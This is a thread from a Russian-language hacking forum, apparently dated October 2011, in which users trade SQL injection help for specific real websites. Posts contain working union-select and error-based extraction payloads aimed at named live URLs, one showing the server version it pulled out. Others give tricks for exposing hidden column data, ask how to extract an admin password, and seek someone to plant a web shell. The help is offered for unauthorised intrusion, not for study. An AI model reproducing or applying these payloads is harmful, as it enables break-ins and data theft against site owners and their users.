05.10.2011, 19:29
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами:
8840513
Репутация:
0
|
|
Сообщение от BigBear
Имхо, это не скуля.
Нужен админский доступ - заюзай XSS лучше
Там доступ в админку была но теперь сама админка удалена.
|
|
|
05.10.2011, 20:07
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от alexvrn
Можно ли раскрутит такую скулю id=1' ?
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY image_order LIMIT 2' at line 1
Помогите пожалуйста Мне тока что с таким сообщением стукнули в аську, ДА МОЖНО, но прежде чем это сделать, нужно хотя бы пару статеек по скулям почитать и понять что к чему, скуля там очень простая:
Сообщение от None
_http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=1'
там фильтруются скобки, а вы навернека первым делом встевели что то типо version()
вообщем вот ваше начало:
Сообщение от None
http://www.mallorca-properties.co.uk/index.php/globals/_slideshow-images_en/?entry_id=-1+union+select+1,2+--+
а дальше хоть немножко напрегите свои извилены!
|
|
|
|
05.10.2011, 20:11
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от z0mbie86
Помогите раскрутить http://217.8.80.55/?m[admin]&id=1'
Код:
https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
version(): 5.0.67
|
|
|
|
06.10.2011, 03:16
|
|
Новичок
Регистрация: 25.05.2011
Сообщений: 1
С нами:
7877846
Репутация:
0
|
|
Привет если есть кто умеет лить шелл отпишитесь в личку пожалуйста или аську в личку.
|
|
|
|
06.10.2011, 03:16
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Доброго здравия форумчане!
В общем ищу где можно почитать про PostgreSQL
Нашёл такую скулю на сайте, а как попросить его показать мне пароль админа не знаю,
Помогите убедить сайт.
Leon2k
Можешь обратиться в личку, всё что знаю расскажу!
|
|
|
|
06.10.2011, 07:49
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
|
|
|
|
07.10.2011, 01:30
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от OxoTnik
такая проблема
Узнал таблицы, колонки, а в нужных колонках он не показывает нужную инфу
Как в этом случае его вытащить??
Ввёл точно все правильно!
Возможно, придётся поработать с выводом, чтото вроде
Код:
unhex(hex(%Visible_Col%)) или AES_DECRYPT(AES_ENCRYPT(%Visible_Col%,0x 71),0x71)
где %Visible_Col% - выводимая колонка в запросе
всё зависит от случая
|
|
|
|
07.10.2011, 02:36
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от OxoTnik
Только где про это почитать?
В любой статье по SQL-иньекциям.
/thread43966.html
/thread104591.html
|
|
|
|
07.10.2011, 11:53
|
|
Новичок
Регистрация: 19.02.2011
Сообщений: 10
С нами:
8014646
Репутация:
0
|
|
insert into помогите с injection
запрос вида
log.php?ver=1.0.1.130'
Ошибка при занесении информации в базу.
118 ******/log.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25
INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }
все параметры строковые, можно как то вставить union+select?
|
|
|
|
07.10.2011, 15:34
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от Mr.aids
запрос вида
log.php?ver=1.0.1.130'
Ошибка при занесении информации в базу.
118 ******/log.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25
INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }
все параметры строковые, можно как то вставить union+select?
/showpost.php?p=2582303&postcount=16413
Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
